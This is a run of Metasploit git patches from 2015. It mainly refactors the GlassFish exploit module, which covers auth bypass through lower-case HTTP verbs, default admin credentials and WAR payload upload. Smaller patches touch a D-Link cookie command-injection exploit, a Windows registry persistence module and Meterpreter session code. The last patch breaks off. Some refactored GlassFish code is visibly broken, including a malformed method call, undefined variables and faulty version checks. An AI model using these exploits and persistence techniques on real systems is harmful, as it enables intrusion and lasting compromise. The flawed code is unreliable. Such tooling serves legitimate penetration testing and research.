-              'Arch'     => ARCH_JAVA,
-              'Platform' => 'java',
-            },
-          ],
-          #
-          # platform specific targets only
-          #
-          [
-            'Windows Universal',
-            {
-              'Arch'     => ARCH_X86,
-              'Platform' => 'win',
-            },
-          ],
-          #
-          # platform specific targets only
-          #
-          [
-            'Linux Universal',
-            {
-              'Arch'     => ARCH_X86,
-              'Platform' => 'linux',
-            },
-          ],
+          [ 'Java Universal',    { 'Arch' => ARCH_JAVA, 'Platform' => 'java' } ],
+          [ 'Windows Universal', { 'Arch' => ARCH_X86,  'Platform' => 'win' } ],
+          [ 'Linux Universal',   { 'Arch' => ARCH_X86,  'Platform' => 'linux' } ],
         ],
       'DisclosureDate' => "Aug 4 2011",
       'DefaultTarget'  => 0))
@@ -83,20 +61,23 @@ class Metasploit3 < Msf::Exploit::Remote
   #
   # Send GET or POST request, and return the response
   #
-  def send_request(path, method, session='', data=nil, ctype=nil)
-
+  def send_glassfish_request(path, method, session='', data=nil, ctype=nil)
     headers = {}
-    headers['Cookie'] = "JSESSIONID=#{session}" if session != ''
-    headers['Content-Type'] = ctype if ctype != nil
+    headers['Cookie'] = "JSESSIONID=#{session}" unless session.blank?
+    headers['Content-Type'] = ctype if ctype
 
     res = send_request_raw({
       'uri'     => path,
       'method'  => method,
       'data'    => data,
       'headers' => headers,
-    }, 90)
+    })
 
-    return res
+    unless res
+      fail_with(Failure::Unknown, 'Connection timed out')
+    end
+
+    res
   end
 
   #
@@ -106,22 +87,22 @@ class Metasploit3 < Msf::Exploit::Remote
     print_status("Attempting to automatically select a target...")
 
     res = query_serverinfo(session,version)
-    return nil if not res
-    return nil if not res.body
+    return nil unless res
+    return nil unless res.body
 
     plat = detect_platform(res.body)
     arch = detect_arch(res.body)
 
     # No arch or platform found?
-    return nil if (not arch or not plat)
+    return nil if !arch || !plat
 
     # see if we have a match
     targets.each do |t|
-      return t if (t['Platform'] == plat) and (t['Arch'] == arch)
+      return t if (t['Platform'] == plat) && (t['Arch'] == arch)
     end
 
     # no matching target found
-    return nil
+    nil
   end
 
   #
@@ -172,36 +153,36 @@ class Metasploit3 < Msf::Exploit::Remote
   def query_serverinfo(session,version)
     res = ''
 
-    if version == '2.x' or version == '9.x'
+    if version == '2.x' || version == '9.x'
       path = "/appServer/jvmReport.jsf?instanceName=server&pageTitle=JVM%20Report"
-      res = send_request(path, @verbs['GET'], session)
+      res = send_glassfish_request(path, @verbs['GET'], session)
     else
       path = "/common/appServer/jvmReport.jsf?pageTitle=JVM%20Report"
-      res = send_request(path, @verbs['GET'], session)
+      res = send_glassfish_request(path, @verbs['GET'], session)
 
-      if ((not res) or (res.code != 200) or (res.body !~ /Operating System Information/))
+      if !res || res.code != 200 || res.body.to_s !~ /Operating System Information/
         path = "/common/appServer/jvmReport.jsf?reportType=summary&instanceName=server"
-        res = send_request(path, @verbs['GET'], session)
+        res = send_glassfish_request(path, @verbs['GET'], session)
       end
     end
 
-    if (not res) or (res.code != 200)
+    if !res || res.code != 200
       print_error("Failed: Error requesting #{path}")
       return nil
     end
 
-    return res
+    res
   end
 
   #
   # Return viewstate and entry before deleting a GlassFish application
   #
   def get_delete_info(session, version, app='')
-    if version == '2.x' or version == '9.x'
+    if version == '2.x' || version == '9.x'
       path = '/applications/webApplications.jsf'
-      res = send_request(path, @verbs['GET'], session)
+      res = send_glassfish_request(path, @verbs['GET'], session)
 
-      if (not res) or (res.code != 200)
+      if !res || res.code != 200
         print_error("Failed (#{res.code.to_s}): Error requesting #{path}")
         return nil
       end
@@ -223,9 +204,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
     else
       path = '/common/applications/applications.jsf?bare=true'
-      res = send_request(path, @verbs['GET'], session)
+      res = send_glassfish_request(path, @verbs['GET'], session)
 
-      if (not res) or (res.code != 200)
+      if !res || res.code != 200
         print_error("Failed (#{res.code.to_s}): Error requesting #{path}")
         return nil
       end
@@ -246,10 +227,10 @@ class Metasploit3 < Msf::Exploit::Remote
       end
     end
 
-    if (viewstate.nil?)
+    if !viewstate
       print_error("Failed: Error getting ViewState")
       return nil
-    elsif (entry.nil?)
+    elsif !entry
       print_error("Failed: Error getting the entry to delete")
     end
 
@@ -280,11 +261,11 @@ class Metasploit3 < Msf::Exploit::Remote
     path  = '/common/applications/applications.jsf'
     ctype = 'application/x-www-form-urlencoded'
 
-    res   = send_request(path, @verbs['POST'], session, data, ctype)
-    if (not res)
+    res   = send_glassfish_request(path, @verbs['POST'], session, data, ctype)
+    if !res
       print_error("Undeployment failed on #{path} - No Response")
     else
-      if res.code < 200 or res.code >= 300
+      if res.code < 200 || res.code >= 300
         print_error("Undeployment failed on #{path} - #{res.code.to_s}:#{res.message.to_s}")
       end
     end
@@ -309,15 +290,15 @@ class Metasploit3 < Msf::Exploit::Remote
     #Set version.  Some GlassFish servers return banner "GlassFish v3".
     if banner =~ /(GlassFish Server|Open Source Edition) (\d\.\d)/
       version = $2
-    elsif banner =~ /GlassFish v(\d)/ and version == 'Unknown'
+    elsif banner =~ /GlassFish v(\d)/ && version == 'Unknown'
       version = $1
-    elsif banner =~ /Sun GlassFish Enterprise Server v2/ and version == 'Unknown'
+    elsif banner =~ /Sun GlassFish Enterprise Server v2/ && version == 'Unknown'
       version = '2.x'
-    elsif banner =~ /Sun Java System Application Server 9/ and version == 'Unknown'
+    elsif banner =~ /Sun Java System Application Server 9/ && version == 'Unknown'
       version = '9.x'
     end
 
-    if version == nil or version == 'Unknown'
+    if version == nil || version == 'Unknown'
       print_status("Unsupported version: #{banner}")
     end
 
@@ -399,7 +380,7 @@ class Metasploit3 < Msf::Exploit::Remote
         format(boundary, "javax.faces.ViewState", viewstate),
         "#{boundary}--"
       ].join()
-    elsif version == '2.x' or version == '9.x'
+    elsif version == '2.x' || version == '9.x'
 
       uploadParam_name = "form:title:sheet1:section1:prop1:fileupload_com.sun.webui.jsf.uploadParam"
       uploadParam_data = "form:title:sheet1:section1:prop1:fileupload"
@@ -518,9 +499,9 @@ class Metasploit3 < Msf::Exploit::Remote
     edition = opts[:edition]
     version = opts[:version]
 
-    if version == '2.x' or version == '9.x'
+    if version == '2.x' || version == '9.x'
       path = "/applications/upload.jsf?appType=webApp"
-      res = send_request(path, @verbs['GET'], session)
+      res = send_glassfish_request(path, @verbs['GET'], session)
 
       #Obtain some properties
       begin
@@ -535,7 +516,7 @@ class Metasploit3 < Msf::Exploit::Remote
       end
     else
       path = "/common/applications/uploadFrame.jsf"
-      res = send_request(path, @verbs['GET'], session)
+      res = send_glassfish_request(path, @verbs['GET'], session)
 
       #Obtain some properties
       begin
@@ -558,10 +539,10 @@ class Metasploit3 < Msf::Exploit::Remote
       end
     end
 
-    #Get upload data
+    # Get upload data
     if version == '3.0'
       ctype = "multipart/form-data; boundary=#{boundary}"
-    elsif version == '2.x' or version == '9.x'
+    elsif version == '2.x' || version == '9.x'
       ctype = "multipart/form-data; boundary=---------------------------#{boundary}"
       typefield = ''
       start = ''
@@ -580,18 +561,19 @@ class Metasploit3 < Msf::Exploit::Remote
       :viewstate => viewstate
     })
 
-    #Upload our payload
-    if version == '2.x' or version == '9.x'
+    # Upload our payload
+    if version == '2.x' || version == '9.x'
       path = '/applications/upload.jsf?form:title:topButtons:uploadButton=%20%20OK%20%20'
     else
       path  = '/common/applications/uploadFrame.jsf?'
       path << 'form:title:topButtons:uploadButton=Processing...'
       path << '&bare=false'
     end
-    res  = send_request(path, @verbs['POST'], session, post_data, ctype)
 
-    #Print upload result
-    if res and res.code == 302
+    res = send_glassfish_request(path, @verbs['POST'], session, post_data, ctype)
+
+    # Print upload result
+    if res.code == 302
       print_status("Successfully uploaded")
     else
       print_error("Error uploading #{res.code}")
@@ -613,7 +595,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'method'  => 'GET',
     })
 
-    if (req)
+    if req
       res = nclient.send_recv(req, 90)
     else
       print_status("Error: #{rhost} did not respond on #{app_rport}.")
@@ -625,7 +607,7 @@ class Metasploit3 < Msf::Exploit::Remote
     #Start undeploying
     print_status("Getting information to undeploy...")
     viewstate, entry = get_delete_info(session, version, app_base)
-    if (not viewstate)
+    if !viewstate
       fail_with(Failure::Unknown, "Unable to get viewstate")
     elsif (not entry)
       fail_with(Failure::Unknown, "Unable to get entry")
@@ -637,230 +619,135 @@ class Metasploit3 < Msf::Exploit::Remote
     print_status("Undeployment complete.")
   end
 
-  #
-  # Try to login to Glassfish with a credential, and return the response
-  #
-  def try_login(user, pass)
-    data  = "j_username=#{Rex::Text.uri_encode(user.to_s)}&"
-    data << "j_password=#{Rex::Text.uri_encode(pass.to_s)}&"
-    data << "loginButton=Login"
+  def init_loginscanner(creds)
+    @cred_collection = Metasploit::Framework::CredentialCollection.new(
+      userpass_file: creds * "\n"
+    )
 
-    path = '/j_security_check'
-    res = send_request(path, @verbs['POST'], '', data, 'application/x-www-form-urlencoded')
-
-    return res
+    @scanner = Metasploit::Framework::LoginScanner::Glassfish.new(
+      configure_http_login_scanner(
+        cred_details: @cred_collection,
+        connection_timeout: 5
+      )
+    )
   end
 
-  def log_success(user = "", pass = "")
-    service_data = {
-      address: Rex::Socket.getaddress(rhost, true),
-      port: rport,
-      protocol: "tcp",
-      service_name: ssl ? "https" : "http",
-      workspace_id: myworkspace_id
-    }
-
-    credential_data = {
-      origin_type: :service,
-      module_fullname: self.fullname,
-      username: user,
-      private_data: pass,
-      private_type: :password
-    }
-
-    credential_core = create_credential(credential_data.merge(service_data))
-
-    login_data = {
-      core: credential_core,
-      access_level: "Admin",
-      status: Metasploit::Model::Login::Status::SUCCESSFUL,
-      last_attempted_at: DateTime.now
-    }
-
-    create_credential_login(login_data.merge(service_data))
-  end
-
-  def try_default_glassfish_login(version)
-    if version == '2.x' or version == '9.x'
-      user = 'admin'
-      pass = 'adminadmin'
-    else
-      user = 'admin'
-      pass = ''
-    end
-
-    return try_glassfish_login(version,user,pass)
-  end
-
-  def try_glassfish_login(version,user,pass,type='default')
-    success = false
-    session = ''
-    res = ''
-    if version == '2.x' or version == '9.x'
-      print_status("Trying #{type} credentials for GlassFish 2.x #{user}:'#{pass}'....")
-      res = try_login(user,pass)
-      if res and res.code == 302
-        session = $1 if res and res.get_cookies =~ /JSESSIONID=(.*); /i
-        res = send_request('/applications/upload.jsf', 'GET', session)
-
-        p = /<title>Deploy Enterprise Applications\/Modules/
-        if (res and res.code.to_i == 200 and res.body.match(p) != nil)
-          success = true
-        end
-      end
-
-    else
-      print_status("Trying #{type} credentials for GlassFish 3.x #{user}:'#{pass}'....")
-      res = try_login(user,pass)
-      if res and res.code == 302
-        session = $1 if res and res.get_cookies =~ /JSESSIONID=(.*); /i
-        res = send_request('/common/applications/uploadFrame.jsf', 'GET', session)
-
-        p = /<title>Deploy Applications or Modules/
-        if (res and res.code.to_i == 200 and res.body.match(p) != nil)
-          success = true
-        end
-      end
-    end
-
-    if success == true
-      print_good("#{my_target_host()} - GlassFish - SUCCESSFUL login for '#{user}' : '#{pass}'")
-      log_success(user,pass)
-    else
-      msg = "#{my_target_host()} - GlassFish - Failed to authenticate login for '#{user}' : '#{pass}'"
-      print_error(msg)
-    end
-
-    return success, res, session
-  end
-
-
   def try_glassfish_auth_bypass(version)
-    print_status("Trying GlassFish authentication bypass..")
-    success = false
+    sid = false
 
-    if version == '2.x' or version == '9.x'
-      res = send_request('/applications/upload.jsf', 'get')
+    if version == '2.x' || version == '9.x'
+      res = send_glassfish_request('/applications/upload.jsf', 'get')
       p = /<title>Deploy Enterprise Applications\/Modules/
-      if (res and res.code.to_i == 200 and res.body.match(p) != nil)
-        success = true
+      if res && res.code.to_i == 200 && res.body.match(p) != nil
+        sid = res.get_cookies.to_s.scan(/JSESSIONID=(.*); /).flatten.first
       end
     else
       # 3.0
-      res = send_request('/common/applications/uploadFrame.jsf', 'get')
+      res = send_glassfish_request('/common/applications/uploadFrame.jsf', 'get')
       p = /<title>Deploy Applications or Modules/
-      if (res and res.code.to_i == 200 and res.body.match(p) != nil)
-        success = true
+      if res && res.code.to_i == 200 && res.body.match(p) != nil
+        sid = res.get_cookies.to_s.scan(/JSESSIONID=(.*); /).flatten.first
       end
     end
 
-    if success == true
-      print_good("#{my_target_host} - GlassFish - SUCCESSFUL authentication bypass")
-      log_success
-    else
-      print_error("#{my_target_host()} - GlassFish - Failed authentication bypass")
-    end
-
-    return success
+    sid
   end
 
   def my_target_host
-    path        = normalize_uri(datastore['PATH'])
+    path = normalize_uri(datastore['PATH'])
     my_target_host = "http://#{rhost.to_s}:#{rport.to_s}/#{path.to_s}"
   end
 
-  def exploit
-    user        = datastore['USERNAME']
-    pass        = datastore['PASSWORD']
-    path        = datastore['PATH']
-    my_target_host = "http://#{rhost.to_s}:#{rport.to_s}/#{path.to_s}"
-    success     = false
-    session     = ''
-    edition     = ''
-    version     = ''
-
-    #Invoke index to gather some info
-    res = send_request('/common/index.jsf', 'GET')
-
-    #If we get a bad connection, we'd rather not try
-    if res.nil?
-      print_error("Unable to get a response from the server")
-      return
+  def try_normal_login(version)
+    case version
+    when /2\.x|9\.x/
+      creds = ['admin adminadmin']
+    when /^3\./
+      creds = ['admin']
+    else
+      creds = []
     end
 
-    if res.code == 302
-      res = send_request('/login.jsf', 'GET')
-    end
+    creds << "#{datastore['USERNAME']} #{datastore['PASSWORD']}"
 
-    #Get GlassFish version
-    edition, version, banner = get_version(res)
-    print_status("Glassfish edition: #{banner}")
+    init_loginscanner(creds)
 
-    #Get session
-    res.get_cookies =~ /JSESSIONID=(.*); /
-    session = $1
-
-    #Set HTTP verbs.  lower-case is used to bypass auth on v3.0
-    @verbs = {
-      'GET'  => (version == '3.0' or version == '2.x' or version == '9.x') ? "get" : 'GET',
-      'POST' => (version == '3.0' or version == '2.x' or version == '9.x') ? 'post' : 'POST',
-    }
-
-    #auth bypass
-    if version == '3.0' or version == '2.x' or version == '9.x'
-      success = try_glassfish_auth_bypass(version)
-    end
-
-    #BUG caused us to skip default cred checks on sun applicaiton server 9.x
-    if success == false and version != '9.x'
-      #default credentials
-      success,res,session_login = try_default_glassfish_login(version)
-
-      if success == false
-        if (
-          ( (version == '2.x' ) and (user != 'admin' or pass != 'adminadmin') )  or
-          ( (version =~ /^3\./) and (user != 'admin' or pass != '') )
-        )
-          #non-default login
-          success,res,session_login = try_glassfish_login(version,user,pass,'non-default')
-        end
+    @scanner.version = version
+    @cred_collection.each do |raw|
+      cred = raw.to_credential
+      result = @scanner.attempt_login(cred)
+      if result == Metasploit::Model::Login::Status::SUCCESSFUL
+        return @scanner.:jsession
       end
     end
 
-    #Start attacking
-    if success
-      session = session_login if (session_login =~ /\w+/)
-      #Set target
-      mytarget = target
-      mytarget = auto_target(session, res, version) if mytarget.name =~ /Automatic/
-      fail_with(Failure::NoTarget, "Unable to automatically select a target") if (not mytarget)
+    nil
+  end
 
-      #Generate payload
-      p = exploit_regenerate_payload(mytarget.platform, mytarget.arch)
+  def attempt_login(version)
+    sid = nil
 
-      jsp_name = rand_text_alphanumeric(4+rand(32-4))
-      app_base = rand_text_alphanumeric(4+rand(32-4))
-
-      war = p.encoded_war({
-        :app_name    => app_base,
-        :jsp_name    => jsp_name,
-        :arch        => mytarget.arch,
-        :platform    => mytarget.platform
-      }).to_s
-
-      #Upload, execute, cleanup, winning
-      print_status("Uploading payload...")
-      res = upload_exec({
-        :session => session,
-        :app_base => app_base,
-        :jsp_name => jsp_name,
-        :war => war,
-        :edition => edition,
-        :version => version
-      })
-    else
-      print_error("#{my_target_host()} - GlassFish - Failed to authenticate login")
+    if version =~ /3\.0|2\.x|9\.x/
+      sid = try_glassfish_auth_bypass(version)
+      return sid if sid
     end
 
+    try_normal_login(version, user, pass, 'non-default')
+  end
+
+  def make_war
+    my_target = auto_target(sid, res, version) if target.name =~ /Automatic/
+    fail_with(Failure::NoTarget, "Unable to automatically select a target") unless mytarget
+
+    # Generate payload
+    p = exploit_regenerate_payload(mytarget.platform, mytarget.arch)
+
+    jsp_name = rand_text_alphanumeric(4+rand(32-4))
+    app_base = rand_text_alphanumeric(4+rand(32-4))
+
+    war = p.encoded_war({
+      :app_name    => app_base,
+      :jsp_name    => jsp_name,
+      :arch        => mytarget.arch,
+      :platform    => mytarget.platform
+    }).to_s
+
+    return app_base, jsp_name, war
+  end
+
+  def exploit
+    # Invoke index to gather some info
+    res = send_glassfish_request('/common/index.jsf', 'GET')
+
+    if res.code == 302
+      res = send_glassfish_request('/login.jsf', 'GET')
+    end
+
+    # Get GlassFish version
+    edition, version, banner = get_version(res)
+    print_status("Glassfish edition: #{banner}")
+
+    # Set HTTP verbs. Lower-case is used to bypass auth on v3.0
+    @verbs = {
+      'GET'  => (version == '3.0' || version == '2.x' || version || '9.x') ? "get" : 'GET',
+      'POST' => (version == '3.0' || version == '2.x' || version || '9.x') ? 'post' : 'POST',
+    }
+
+    sid = attempt_login(version)
+
+    unless sid
+      fail_with(Failure::NoAccess, "#{my_target_host()} - GlassFish - Failed to authenticate login")
+    end
+
+    app_base, jsp_name, war = make_war
+    print_status("Uploading payload...")
+    res = upload_exec({
+      :session => sid,
+      :app_base => app_base,
+      :jsp_name => jsp_name,
+      :war => war,
+      :edition => edition,
+      :version => version
+    })
   end
 end

From c8dddbff70260321a17ee80497307af10c028c11 Mon Sep 17 00:00:00 2001
From: Michael Messner <devnull@s3cur1ty.de>
Date: Wed, 24 Jun 2015 21:32:01 +0200
Subject: [PATCH 0543/1013] server header

---
 .../linux/http/dlink_dspw110_cookie_noauth_exec.rb       | 9 ++++-----
 1 file changed, 4 insertions(+), 5 deletions(-)

diff --git a/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb b/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb
index 38f31f9672..ae3358f0db 100644
--- a/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb
+++ b/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb
@@ -18,8 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote
         This module exploits an anonymous remote upload and code execution vulnerability on different
         D-Link devices. The vulnerability is a command injection in the cookie handling process of the
         lighttpd web server when handling specially crafted cookie values. This module has been
-        successfully tested on D-Link DSP-W110A1_FW105B01 in emulated environment and on the real
-        device.
+        successfully tested on D-Link DSP-W110A1_FW105B01 in emulated environment.
       },
       'Author'         =>
         [
@@ -39,13 +38,13 @@ class Metasploit3 < Msf::Exploit::Remote
         },
       'Targets' =>
         [
-          [ 'MIPS Little Endian',
+          [ 'MIPS Little Endian',  # unknown if there are LE devices out there ... but in case we have a target
             {
               'Platform' => 'linux',
               'Arch'     => ARCH_MIPSLE
             }
           ],
-          [ 'MIPS Big Endian',  # unknown if there are BE devices out there ... but in case we have a target
+          [ 'MIPS Big Endian',
             {
               'Platform' => 'linux',
               'Arch'     => ARCH_MIPSBE
@@ -63,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
         'method' => 'GET',
       })
 
-      if res && res.headers["Server"] =~ /lighttpd\/1.4.34/
+      if res && res.headers["Server"] =~ /lighttpd\/1\.4\.34/
         return Exploit::CheckCode::Detected
       end
     rescue ::Rex::ConnectionError

From e7e8135acd1bd674a1f665289ad0f6d7522d1fef Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Wed, 24 Jun 2015 14:28:51 -0500
Subject: [PATCH 0544/1013] Clean up module

---
 modules/exploits/windows/local/persistence.rb | 89 ++++++++++---------
 1 file changed, 45 insertions(+), 44 deletions(-)

diff --git a/modules/exploits/windows/local/persistence.rb b/modules/exploits/windows/local/persistence.rb
index 833c76d007..0cd6a3fe08 100644
--- a/modules/exploits/windows/local/persistence.rb
+++ b/modules/exploits/windows/local/persistence.rb
@@ -11,37 +11,38 @@ require 'msf/core/post/windows/priv'
 require 'msf/core/post/windows/registry'
 require 'msf/core/exploit/exe'
 
-class Metasploit3 < Msf::Exploit::Local
+class Metasploit4 < Msf::Exploit::Local
+
   Rank = ExcellentRanking
 
   include Msf::Post::Common
   include Msf::Post::File
   include Msf::Post::Windows::Priv
   include Msf::Post::Windows::Registry
-  include Exploit::EXE
+  include Msf::Exploit::EXE
 
-  def initialize(info={})
-    super( update_info( info,
-      'Name'          => 'Windows Persistent Registry Startup Payload Installer',
-      'Description'   => %q{
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Windows Persistent Registry Startup Payload Installer',
+      'Description'    => %q{
         This module will install a payload that is executed during boot.
         It will be executed either at user logon or system startup via the registry
         value in "CurrentVersion\Run" (depending on privilege and selected method).
       },
-      'License'       => MSF_LICENSE,
-      'Author'        =>
+      'License'        => MSF_LICENSE,
+      'Author'         =>
         [
           'Carlos Perez <carlos_perez[at]darkoperator.com>',
-          'g0tmi1k'   # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features
+          'g0tmi1k' # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features
         ],
-      'Platform'      => [ 'win' ],
-      'SessionTypes'  => [ 'meterpreter' ],
-      'Targets'       => [ [ 'Windows', {} ] ],
-      'DefaultTarget' => 0,
-      'DisclosureDate'=> "Oct 19 2011",
-      'DefaultOptions'=>
+      'Platform'       => [ 'win' ],
+      'SessionTypes'   => [ 'meterpreter' ],
+      'Targets'        => [ [ 'Windows', {} ] ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => "Oct 19 2011",
+      'DefaultOptions' =>
         {
-          'DisablePayloadHandler' => 'true',
+          'DisablePayloadHandler' => 'true'
         }
     ))
 
@@ -62,9 +63,9 @@ class Metasploit3 < Msf::Exploit::Local
 
     register_advanced_options([
       OptBool.new('HANDLER',
-        [ false, 'Start an exploit/multi/handler job to receive the connection', false]),
+        [false, 'Start an exploit/multi/handler job to receive the connection', false]),
       OptBool.new('EXEC_AFTER',
-        [ false, 'Execute persistent script after installing.', false])
+        [false, 'Execute persistent script after installing.', false])
     ], self.class)
   end
 
@@ -75,9 +76,9 @@ class Metasploit3 < Msf::Exploit::Local
     rexe_name = datastore['EXE_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
     reg_val   = datastore['REG_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
     startup   = datastore['STARTUP'].downcase
-    delay = datastore['DELAY'] || 10
-    exc_after = datastore['EXEC_AFTER'] || false
-    handler = datastore['HANDLER'] || false
+    delay = datastore['DELAY']
+    exec_after = datastore['EXEC_AFTER']
+    handler = datastore['HANDLER']
     @clean_up_rc = ""
 
     rvbs_name = rvbs_name + '.vbs' if rvbs_name[-4,4] != '.vbs'
@@ -85,19 +86,19 @@ class Metasploit3 < Msf::Exploit::Local
 
     # Connect to the session
     begin
-      host, port = session.session_host, session.session_port
+      host = session.session_host
       print_status("Running persistent module against #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
     rescue => e
-      print_error("Could not connect to session")
+      print_error("Could not connect to session: #{e}")
       return nil
     end
 
     # Check values
-    if (is_system?) && (startup == 'user')
+    if is_system? && startup == 'user'
       print_warning('Note: Current user is SYSTEM & STARTUP == USER. This user may not login often!')
     end
 
-    if (handler) && (!datastore['DisablePayloadHandler'])
+    if handler && !datastore['DisablePayloadHandler']
       # DisablePayloadHandler will stop listening after the script finishes - we want a job so it continues afterwards!
       print_warning("Note: HANDLER == TRUE && DisablePayloadHandler == TRUE. This will create issues...")
       print_warning("Disabling HANDLER...")
@@ -141,7 +142,7 @@ class Metasploit3 < Msf::Exploit::Local
     end
 
     # Do we execute the VBS script afterwards?
-    target_exec(script_on_target) if datastore['EXEC_AFTER']
+    target_exec(script_on_target) if exec_after
 
     # Create 'clean up' resource file
     clean_rc = log_file()
@@ -170,12 +171,12 @@ class Metasploit3 < Msf::Exploit::Local
     temppath = datastore['PATH'] || session.sys.config.getenv('TEMP')
     filepath = temppath + "\\" + filename
 
-    if !directory? temppath
+    unless directory?(temppath)
       print_error("#{temppath} does not exists on the target")
       return nil
     end
 
-    if file? filepath
+    if file?(filepath)
       print_warning("#{filepath} already exists on the target. Deleting...")
       begin
         file_rm(filepath)
@@ -198,7 +199,7 @@ class Metasploit3 < Msf::Exploit::Local
       filepath = nil
     end
 
-    return filepath
+    filepath
   end
 
   # Installs payload in to the registry HKLM or HKCU
@@ -216,16 +217,15 @@ class Metasploit3 < Msf::Exploit::Local
       regsuccess = false
     end
 
-    return regsuccess
+    regsuccess
   end
 
-
   # Executes script on target and returns true if it was successfully started
   def target_exec(script_on_target)
     execsuccess = true
     print_status("Executing script #{script_on_target}")
     # Lets give the target a few seconds to catch up...
-    sleep(3)
+    Rex.sleep(3)
 
     # Error handling for process.execute() can throw a RequestError in send_request.
     begin
@@ -239,7 +239,7 @@ class Metasploit3 < Msf::Exploit::Local
       execsuccess = false
     end
 
-    return execsuccess
+    execsuccess
   end
 
   # Starts a exploit/multi/handler session
@@ -248,7 +248,8 @@ class Metasploit3 < Msf::Exploit::Local
     pay.datastore['LHOST'] = lhost
     pay.datastore['LPORT'] = lport
     print_status('Starting exploit/multi/handler')
-    if !check_for_listener(lhost, lport)
+
+    unless check_for_listener(lhost, lport)
       # Set options for module
       mh = client.framework.exploits.create('multi/handler')
       mh.share_datastore(pay.datastore)
@@ -260,11 +261,11 @@ class Metasploit3 < Msf::Exploit::Local
       mh.options.validate(mh.datastore)
       # Execute showing output
       mh.exploit_simple(
-          'Payload'     => mh.datastore['PAYLOAD'],
-          'LocalInput'  => self.user_input,
-          'LocalOutput' => self.user_output,
-          'RunAsJob'    => true
-        )
+        'Payload'     => mh.datastore['PAYLOAD'],
+        'LocalInput'  => self.user_input,
+        'LocalOutput' => self.user_output,
+        'RunAsJob'    => true
+      )
 
       # Check to make sure that the handler is actually valid
       # If another process has the port open, then the handler will fail
@@ -272,7 +273,7 @@ class Metasploit3 < Msf::Exploit::Local
       # the handler time to fail or the resulting connections from the
       # target could end up on on a different handler with the wrong payload
       # or dropped entirely.
-      select(nil, nil, nil, 5)
+      Rex.sleep(5)
       return nil if framework.jobs[mh.job_id.to_s].nil?
 
       return mh.job_id.to_s
@@ -296,7 +297,7 @@ class Metasploit3 < Msf::Exploit::Local
         end
       end
     end
-    return false
+    false
   end
 
   # Function for creating log folder and returning log path
@@ -310,10 +311,10 @@ class Metasploit3 < Msf::Exploit::Local
     # Create a directory for the logs
     if log_path
       logs = ::File.join(log_path, 'logs', 'persistence',
-                         Rex::FileUtils.clean_path(host + filenameinfo) )
+                         Rex::FileUtils.clean_path(host + filenameinfo))
     else
       logs = ::File.join(Msf::Config.log_directory, 'persistence',
-                         Rex::FileUtils.clean_path(host + filenameinfo) )
+                         Rex::FileUtils.clean_path(host + filenameinfo))
     end
 
     # Create the log directory
@@ -321,7 +322,7 @@ class Metasploit3 < Msf::Exploit::Local
 
     # logfile name
     logfile = logs + ::File::Separator + Rex::FileUtils.clean_path(host + filenameinfo) + ".rc"
-    return logfile
+    logfile
   end
 
 end

From 151fa2f67668dd923d39a24cc6a799d424de5e23 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Wed, 24 Jun 2015 20:50:29 +0100
Subject: [PATCH 0545/1013] Update user info on migrate

---
 lib/msf/base/sessions/meterpreter.rb          | 27 ++++++++++---------
 .../ui/console/command_dispatcher/core.rb     |  3 +++
 2 files changed, 18 insertions(+), 12 deletions(-)

diff --git a/lib/msf/base/sessions/meterpreter.rb b/lib/msf/base/sessions/meterpreter.rb
index 35227de609..a389c66a9f 100644
--- a/lib/msf/base/sessions/meterpreter.rb
+++ b/lib/msf/base/sessions/meterpreter.rb
@@ -319,25 +319,28 @@ class Meterpreter < Rex::Post::Meterpreter::Client
     false
   end
 
+  def update_session_info
+    username = self.sys.config.getuid
+    sysinfo  = self.sys.config.sysinfo
+
+    safe_info = "#{username} @ #{sysinfo['Computer']}"
+    safe_info.force_encoding("ASCII-8BIT") if safe_info.respond_to?(:force_encoding)
+    # Should probably be using Rex::Text.ascii_safe_hex but leave
+    # this as is for now since "\xNN" is arguably uglier than "_"
+    # showing up in various places in the UI.
+    safe_info.gsub!(/[\x00-\x08\x0b\x0c\x0e-\x19\x7f-\xff]+/n,"_")
+    self.info = safe_info
+  end
+
   #
   # Populate the session information.
   #
   # Also reports a session_fingerprint note for host os normalization.
   #
-  def load_session_info()
+  def load_session_info
     begin
       ::Timeout.timeout(60) do
-        # Gather username/system information
-        username = self.sys.config.getuid
-        sysinfo  = self.sys.config.sysinfo
-
-        safe_info = "#{username} @ #{sysinfo['Computer']}"
-        safe_info.force_encoding("ASCII-8BIT") if safe_info.respond_to?(:force_encoding)
-        # Should probably be using Rex::Text.ascii_safe_hex but leave
-        # this as is for now since "\xNN" is arguably uglier than "_"
-        # showing up in various places in the UI.
-        safe_info.gsub!(/[\x00-\x08\x0b\x0c\x0e-\x19\x7f-\xff]+/n,"_")
-        self.info = safe_info
+        update_session_info
 
         hobj = nil
 
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
index 654b44c5ec..00dd2817c9 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
@@ -818,6 +818,9 @@ class Console::CommandDispatcher::Core
 
     print_status("Migration completed successfully.")
 
+    # Update session info (we may have a new username)
+    client.update_session_info
+
     unless existing_relays.empty?
       print_status("Recreating TCP relay(s)...")
       existing_relays.each do |r|

From cea8605365e68e3d4630e2e437a8ad6b0da6cf4a Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Wed, 24 Jun 2015 10:34:50 -0700
Subject: [PATCH 0546/1013] Fix #5596 by catching RuntimeError from Rex::Poly

---
 modules/encoders/x86/shikata_ga_nai.rb | 5 +++--
